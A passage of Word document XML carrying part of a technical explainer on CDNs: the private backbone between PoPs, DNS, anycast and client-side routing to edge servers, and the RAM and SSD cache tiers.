    </w:p>
    <w:p w14:paraId="237E5A7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Dedicated fiber connecting PoPs directly (no shared transit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162163F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Optimized routing (latency-aware, not policy-driven).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC4880" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Pre-established TCP connections between PoPs (no handshake delay on cache miss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7639A1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Often uses QUIC or custom protocols between PoPs (better than TCP for long-distance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318DBB51" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Even when a cache miss occurs, the miss traffic travels over a faster, more reliable path than the public Internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557E692" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38354834" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without CDN: User → (public Internet, 15 hops, variable quality) → Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1FD292" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>With CDN miss: User → Edge (5ms) → Private backbone (optimized) → Shield/Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE2985" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The "miss path" through a CDN is still faster than going directly to origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB9E2C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="599BCAE0">
          <v:rect id="_x0000_i4684" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1FC311" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. How CDN Routing Works — Getting Users to the Right Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B4F26" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 DNS-Based Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496834D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most common approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF828E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>User's browser resolves cdn.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77005DBF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>DNS query reaches CDN's authoritative nameserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64195242" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN nameserver determines the best PoP for this user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75A124" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>From resolver IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Geolocate the recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB3C2E3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>From EDNS Client Subnet (ECS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Geolocate the actual client subnet (more accurate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04484C05" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Returns the IP address of the optimal edge PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64990F37" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decision factors for PoP selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE9A20C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Geographic proximity (closest PoP to user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA83DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Network latency (measured, not just geographic — sometimes a farther PoP has better connectivity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1CFDC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>PoP health (don't route to an overloaded or unhealthy PoP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0208F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>PoP capacity (don't route to a PoP that's at 90% CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDDEEAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content availability (route to a PoP that likely has the content cached — "content-aware routing").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A7629" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitations of DNS routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033BA6B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Granularity limited to DNS TTL (changes take effect after TTL expiry — typically 30–60 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B836534" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Resolver IP may not reflect user location (large public resolvers like 8.8.8.8 serve globally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE368F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>ECS partially solves this but not all resolvers support it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040FEE69" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Anycast Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239D954" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30536BA5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>All edge PoPs advertise the SAME IP address via BGP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5563CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E24E31" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>PoP Tokyo announces: 104.16.0.0/12 via BGP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE99C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>PoP London announces: 104.16.0.0/12 via BGP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE10F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>PoP São Paulo announces: 104.16.0.0/12 via BGP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D3A2F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When a user sends a packet to an IP in 104.16.0.0/12:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CDD2DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Internet routing (BGP) delivers it to the "nearest" PoP (in BGP terms — fewest AS hops or best local preference).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F9EE4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No DNS decision needed — routing handles it at the network layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F3730" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Failover is automatic: if a PoP goes down, it withdraws its BGP announcement → traffic shifts to next-nearest PoP within seconds (BGP convergence).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E952CA4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages over DNS routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE6152" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Faster failover (BGP convergence: 1–90 seconds vs. DNS TTL: 30–300 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D488D83" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Works for ANY protocol (not just HTTP — also UDP, QUIC, TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369A4D9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No DNS lookup latency for routing decision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5CC89" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Natural DDoS distribution (attack traffic is spread across all PoPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E463FC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge — connection persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC8793" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If BGP routes shift (due to network changes), existing TCP connections may be routed to a different PoP than where they were established. That PoP doesn't have the connection state → connection breaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349E1C1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64666A4D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>QUIC (connection ID-based, survives IP path changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4808E6DC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>ECMP-aware routing (keep connections pinned to consistent paths).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D6C6D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Short-lived connections (HTTP requests complete quickly, so route changes between requests don't matter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048557A9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Client-Side Routing (Performance-Based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A809B81" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some CDN clients measure latency to multiple PoPs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA64AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>On page load, JavaScript/SDK pings multiple CDN PoPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F551F43" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Measures actual round-trip time to each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9CFBB9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Routes subsequent requests to the fastest one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471C365" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Periodically re-measures (network conditions change).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B61D5B4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Multi-CDN orchestrators (Citrix ITM, NS1), video players (choosing optimal CDN for each segment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63503653" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="48C2EA83">
          <v:rect id="_x0000_i4685" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1741097D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. CDN Caching — The Core Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515B323" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 How the Cache Stores Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C861E6F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In-memory cache (L1 — hottest content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A3E32" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Hash table mapping cache keys to content in RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40F502" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Fastest access: &lt; 1 microsecond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26041656" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Limited by available RAM (1–10% of total content catalog fits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D99519" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>LRU/LFU eviction: least-used content drops out as new content enters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073987DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Stores: the most frequently accessed objects (viral videos, homepage assets, popular API responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E3ACC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSD cache (L2 — warm content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C27435" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content stored on local NVMe SSDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0F5C3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Access time: 50–200 microseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481111E1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Much larger capacity: hundreds of TB per PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7CEFC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Handles the "long tail" of content that doesn't fit in RAM.</w:t>
      </w:r>
    </w:p>
